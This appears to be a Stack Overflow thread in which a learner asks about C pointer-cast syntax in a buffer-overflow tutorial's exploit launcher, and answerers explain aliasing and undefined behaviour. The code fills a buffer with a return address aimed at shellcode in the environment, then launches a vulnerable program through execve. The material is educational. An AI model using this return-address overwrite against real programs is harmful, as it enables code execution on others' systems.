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I encountered some code in a tutorial about buffer overflows. It's a program that exploits a simple program that is vulnerable to a buffer overflow (if some stack protection mechanisms are turned off).

My question is: what is the for loop doing? I mean the line within the for loop:

*(void **)(buf + i) = addr;

Its a bit of a strange syntax that I haven't seen before, or maybe I have seen it but it just confuses me.

The idea of the program is that the buf is passed as argument to the vulnerable program and through a strcpy it will overwrite the return address on the stack such that it will run the shellcode that is passed in an environment parameter.

Thanks!

The full code:

int main(int argc, char **argv) {
    void *addr = (char *) 0xc0000000 - 4 - (strlen(VULN) + 1) - (strlen(&shellcode) + 1);
    char buf[768];
    size_t i;

    for (i = 0; i < sizeof(buf); i += sizeof(void *)) {
        *(void **)(buf + i) = addr;
    }

    char *params[] = { VULN, buf, NULL };
    char *env[] = { &shellcode, NULL };
    execve(VULN, params, env);
    perror("execve");

    return -1;
}
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2 Answers 2

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C has a kind of Treehorn type system. For any object x of type T, you can pretend it's an object of a different type. To do so, you cast the address of the object. So, in steps:

  1. T x; is an object of type T.

  2. &x is the address of the object, it's of type T * – "pointer to T".

  3. Now pretend this is a pointer to something else: (U *)(&x) – a "pointer to U", but it's the same value.

  4. If we dereference that, we treat the object x as though it were a U: *(U *)(&x)

Now apply all this to T = char, x = buf[i] and U = void * in your code. Note that &buf[i] is identical to buf + i. Also note that i is incremented in strides of sizeof(void *) so that each round of the loop doesn't step on the memory touched by the previous rounds.

A word of warning: it is generally not allowed to treat one object as though it were one of a different type; this is undefined behavior. There are only some exceptions; e.g. you can treat an int as though it were an unsigned int, and you can treat any object x as though it were a char[sizeof x]. (None of these are the case in your code, which is not well-formed.)

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  • Could you please elaborate more on "you can treat any object x as though it were a char[sizeof x]"? And how could we treat an int as if it were unsigned int? Thanks very much in advance.
    – Unheilig
    Mar 11, 2014 at 22:23
  • @Unheilig: 1) (char*)(&x), 2) int n; *(unsigned int *)(&n) = 1;. The latter is about layout compatible types, the former allows you to access the underlying representation of a type (e.g. for serialization).
    – Kerrek SB
    Mar 11, 2014 at 22:29
  • @Unheilig: There should be many related posts here on SO. Search around for a bit.
    – Kerrek SB
    Mar 11, 2014 at 22:47
  • Great explanation! Thanks! What would be a more common (and allowed) way of copying a 4 byte pointer into a buffer?
    – Maricruzz
    Mar 11, 2014 at 23:39
  • @Maricruzz: Invert the approach: Don't treat bytes like objects; treat objects like bytes (hence the opening analogy). For example: char const * pa = (char const *)(&addr); buf[i] = pa[0]; buf[i + 1] = pa[1]; etc, up to sizeof addr. Either in a loop, or memcpy is also fine (the compiler can do memcpy with static sizes very efficiently).
    – Kerrek SB
    Mar 11, 2014 at 23:44
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First, it calculates a value which will remain constant throughout the execution of the for loop:

0xc0000000 - 4 - (strlen(VULN) + 1) - (strlen(&shellcode) + 1)

Then, inside the for loop, it writes this constant value into every "4-byte entry" in the buf array:

buf[0...3] = the constant value
buf[4...7] = the constant value
buf[8...11] = the constant value
...
buf[764...767] = the constant value

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